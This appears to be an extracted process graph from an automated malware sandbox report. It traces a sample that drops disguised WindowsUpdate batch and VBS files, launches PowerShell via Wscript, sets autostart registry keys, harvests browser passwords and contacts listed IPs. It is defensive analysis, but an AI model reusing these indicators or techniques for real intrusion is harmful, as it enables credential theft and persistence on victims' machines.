49->69 71 2 other processes 51->71 73 2 other processes 53->73 75 6 other processes 55->75 file10 signatures11 process12 file13 113 C:\Users\user\AppData\Local\Temp\c.bat, ASCII 57->113 dropped 169 Wscript starts Powershell (via cmd or directly) 57->169 77 cmd.exe 1 57->77         started        115 C:\Users\user\...\WindowsUpdate_394.bat, ASCII 61->115 dropped 171 Creates multiple autostart registry keys 61->171 79 WerFault.exe 61->79         started        117 C:\Users\user\AppData\Local\...\ilcg05nv.dll, PE32 65->117 dropped 81 cvtres.exe 1 65->81         started        119 C:\Users\user\...\WindowsUpdate_801.bat, ASCII 67->119 dropped 83 WerFault.exe 67->83         started        121 C:\Users\user\...\WindowsUpdate_87.bat, ASCII 69->121 dropped 85 WerFault.exe 69->85         started        123 C:\Users\user\...\WindowsUpdate_412.bat, ASCII 71->123 dropped 87 WerFault.exe 71->87         started        89 WerFault.exe 75->89         started        91 WerFault.exe 75->91         started        signatures14 process15 process16 93 cmd.exe 2 77->93         started        96 conhost.exe 77->96         started        signatures17 181 Suspicious powershell command line found 93->181 183 Wscript starts Powershell (via cmd or directly) 93->183 98 powershell.exe 16 46 93->98         started        103 conhost.exe 93->103         started        process18 dnsIp19 131 158.101.44.242, 50055, 50059, 50062 ORACLE-BMC-31898US United States 98->131 133 checkip.dyndns.com 193.122.6.168, 49774, 49820, 49853 ORACLE-BMC-31898US United States 98->133 135 3 other IPs or domains 98->135 105 C:\Users\user\...\WindowsUpdate_706.vbs, ASCII 98->105 dropped 107 C:\Users\user\...\WindowsUpdate_706.bat, ASCII 98->107 dropped 149 Creates multiple autostart registry keys 98->149 151 Tries to harvest and steal browser information (history, passwords, etc) 98->151 153 Found suspicious powershell code related to unpacking or dynamic code loading 98->153 155 Loading BitLocker PowerShell Module 98->155 file20 signatures21

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.